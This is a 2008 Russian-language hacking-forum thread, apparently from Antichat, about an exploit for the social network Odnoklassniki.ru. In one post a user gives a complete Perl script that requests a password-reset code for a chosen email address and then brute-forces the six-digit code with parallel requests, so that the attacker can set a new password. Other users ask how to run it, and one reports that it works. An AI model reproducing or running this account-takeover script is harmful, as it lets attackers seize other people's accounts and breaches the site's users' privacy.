Появился эксплоит для "Одноклассников.ру"

Discussion in 'Мировые новости. Обсуждения.' started by Prod, 23 May 2008.

  1. brasco2k

    brasco2k Elder - Старейшина

    Joined:
    23 Nov 2007
    Messages:
    258
    Likes Received:
    91
    Reputations:
    0
    Думаю поставят статус сервис временно приостановлен заходите через 2 часа.
    К тому времени программеры залатают дырку.
    А еще возможно что rst спецально распускают такой слух чотбы нарушить работу сервиса.
     
  2. br3k

    br3k Elder - Старейшина

    Joined:
    19 Sep 2007
    Messages:
    130
    Likes Received:
    107
    Reputations:
    17
    Исключено.
    Делать больше rst нечего, как распускать слухи, привликать лишнее внимание, и вообще заниматься ерундой.
     
  3. Yulo

    Yulo Elder - Старейшина

    Joined:
    21 Jan 2008
    Messages:
    69
    Likes Received:
    19
    Reputations:
    4
    Мне казалось rst уже давно распались и ничего нового не выпускают!!!..Или я не прав?
    А насчет сплойта чушь полная, уже через день или пару он не будет работать.А значит смысла трудиться над ним и выпускать в паблик нет.
     
  4. Vid0k

    Vid0k Elder - Старейшина

    Joined:
    24 Dec 2007
    Messages:
    393
    Likes Received:
    125
    Reputations:
    13
    да проект закрыли но парни все равно
    держут контакты и общаются через ЖЖ
    у них не такой смысл как у тебя они продолжают этим заниматься потому что им нравиться а не от того чтобы зафейсить сайт или поднять бабла на новом эксплоейте и им безразницы будет работать слойт через день или два после выхода в паблик
    они просто еще раз всем докажут что
    даже крупные и раскрученные проекты имеют уязвимости
     
    1 person likes this.
  5. Karantin

    Karantin Elder - Старейшина

    Joined:
    21 Dec 2007
    Messages:
    330
    Likes Received:
    146
    Reputations:
    24
    Vid0k, абсолютно с тобой согласен. Кому интересно - http://rstghc.livejournal.com.
     
  6. Шавникс

    Joined:
    25 May 2008
    Messages:
    0
    Likes Received:
    5
    Reputations:
    0
    ой бля как пиарят себя
     
  7. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    Будет интересно посмотреть на сплойт...
     
  8. Шавникс

    Joined:
    25 May 2008
    Messages:
    0
    Likes Received:
    5
    Reputations:
    0
    а сзади
     
    1 person likes this.
  9. Чиловег Ниоткудо

    Joined:
    24 May 2008
    Messages:
    23
    Likes Received:
    13
    Reputations:
    4
    http://rstghc.livejournal.com/14478.html?thread=101262#t101262

    чето вроде глухо....
     
  10. Karantin

    Karantin Elder - Старейшина

    Joined:
    21 Dec 2007
    Messages:
    330
    Likes Received:
    146
    Reputations:
    24
    Брутфорс кода восстановления
    Code:
    #!/usr/bin/perl
    use LWP::UserAgent;
    
    print qq(
       ,__                    __,                       
       \\ \\                    / /                     
        \\ \\     __      _    / /                      
           \\  .___/\\:::* /\\ /                         
              |_____\\  |/  \\                         
             /<>//,./      /       _________                             
            /      /      /  \\    |  RST                 
           /      /.,\\\\<>/\\   \\   |   GHC                       
           \\      \\    /'  \\  /   |    UKT
            \\      \\  /     \\     |__\\xD____                         
             \\      \\/      /                           
           /  '''\\'''      /                               
        / /       \\   \\   / \\ \\                         
       / /         ___ \\ /   \\ \\                       
       *__                    __*
                   [preved odnoklassne4gi]
                     
    );
    
    
    
    if (!scalar(@ARGV)) {
        print "\[~\]Usage : ./$0 eMail {number of child procs}\n\n";
        exit();
    }
    if (-e "success") {
        print "\[-\] File \"success\" exists in your directory. Please rename it or remove.\n\n";
        exit();    
    }
    
    my $email="$ARGV[0]";
    
    if ($ARGV[1]) {
        my $MAX_PROCESSES=$ARGV[1];
    } else {
        my $MAX_PROCESSES=5;
    }
    my $DEBUG=0;
    
    my @pids;
    my $npids=0;
    my $restore=0;
    my $e;
    
    # first step - omg! I lost my password?!?!?!
    $ua=LWP::UserAgent->new();
    $page=$ua->post("http://odnoklassniki.ru/cdk/st.cmd/password/tkn/6544",["st.email"=>$email,"st.posted"=>"set"]);
    $page_content=$page->content();
    if ($page_content=~/st.email/) {
        print "\[-\] Please provide correct email address\n";
        exit();
    } else {
        print "\[+\] Repair password code send to $email\n";
    }
    
    # step number two - bruteforce code for repair password
    print "\[~\] Brutforce code for repair password\
    This process make take max ~ 18 hours to check all combinations\
    You need good internet channel and fast cpu\n";
    open(LOG_FILE,">>log");
    $not=1;
    for ($code=100000;$code<=999999;$code++) {
        if (-e "success") {
            print "DONE";
            exit();
        }
        if ($code==199999 && $not==1) {
            $cod="099999";
            $not=0;
            $code=100000;
        } elsif ($code=~/^1(\d+)$/ && $not==1) {
            $code=~/^1(\d+)$/;
            $cod="0$1";
        } else {
            $cod=$code;
        }
        if ($cod=~/^(\d+)000$/) {
            print "#";
        }
    
        my $pid;
        $pid=fork();
        if($pid>0){
         push(@pids,$pid);
         $npids++;
         if($npids>=$MAX_PROCESSES){
             for(1..($MAX_PROCESSES)){
              $wait_ret=wait();
              if($wait_ret>0){
                        $npids--;
                    }
                }
            }
            next;
        }elsif(undef $pid){
            print "fork error\n" if ($DEBUG);
            exit(0);
        }
        $p=$ua->post("http://www.odnoklassniki.ru/dk",["st.cmd"=>"passwordReset","st.email"=>$email,"st.confirmation-code"=>$cod,"st.posted"=>"set"]);
        $con=$p->content();
        if ($con=~/password.confirmation/) {
            print "$cod cached\n";
            print LOG_FILE "$cod cached\n";
            open(SUCCESS,">>success");
            print SUCCESS "\n############################\n";
            print SUCCESS "Yahooo! Congratulations! Code for password repair is - $cod\n";
            print SUCCESS "Go to http://www.odnoklassniki.ru//dk?st.cmd=passwordReset\n";
            print SUCCESS "Type your email ($email), your repair code ($cod) and set new password for your account.\n";
            print SUCCESS "############################\n";
            print "############################\n";
            print "Yahooo! Congratulations! Code for password repair is - $cod\n";
            print "Go to http://www.odnoklassniki.ru//dk?st.cmd=passwordReset\n";
            print "Type your email ($email), your repair code ($cod) and set new password for your account.\n";
            print "############################\n";
            close(SUCCESS);
        } else {
            print LOG_FILE "$cod failed\n";
        }
        exit();
    }
    close(LOG_FILE);
     
  11. Чиловег Ниоткудо

    Joined:
    24 May 2008
    Messages:
    23
    Likes Received:
    13
    Reputations:
    4
    это он и есть? спс...
    честно говоря, так и думал, что сплойт не будет тупо выплевывать пасс... рст кросавчеги
     
  12. BuzzSaw

    BuzzSaw New Member

    Joined:
    6 Mar 2008
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    весело было сидеть в ИРКЕ и слушать всё.... потом часть людей отсеялось и вуаля..
     
  13. Karantin

    Karantin Elder - Старейшина

    Joined:
    21 Dec 2007
    Messages:
    330
    Likes Received:
    146
    Reputations:
    24
    там еще тусует народ
     
  14. .:KeepeR:.

    .:KeepeR:. Banned

    Joined:
    18 Feb 2008
    Messages:
    25
    Likes Received:
    43
    Reputations:
    0
    у когото сплоит запустился?
    у меня выдает:
     
  15. S|\/|eliyK()T

    S|\/|eliyK()T Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    138
    Likes Received:
    58
    Reputations:
    11
    Исходник читал?
     
    #35 S|\/|eliyK()T, 26 May 2008
    Last edited: 26 May 2008
  16. .:KeepeR:.

    .:KeepeR:. Banned

    Joined:
    18 Feb 2008
    Messages:
    25
    Likes Received:
    43
    Reputations:
    0
    а какой нужен? Я могу и с серва запустить.... Только если он запишет результат в лог какойто
     
  17. Karantin

    Karantin Elder - Старейшина

    Joined:
    21 Dec 2007
    Messages:
    330
    Likes Received:
    146
    Reputations:
    24
    там файл log появится в папке со сплойтом
     
  18. .:KeepeR:.

    .:KeepeR:. Banned

    Joined:
    18 Feb 2008
    Messages:
    25
    Likes Received:
    43
    Reputations:
    0
    а как он будет подписан?
     
  19. Чиловег Ниоткудо

    Joined:
    24 May 2008
    Messages:
    23
    Likes Received:
    13
    Reputations:
    4
    с какими параметрами запускать?
    и зачем нужен первый шаг?
     
  20. Sharky

    Sharky Elder - Старейшина

    Joined:
    1 May 2006
    Messages:
    487
    Likes Received:
    312
    Reputations:
    46
    всё работает...спасибо
     
Loading...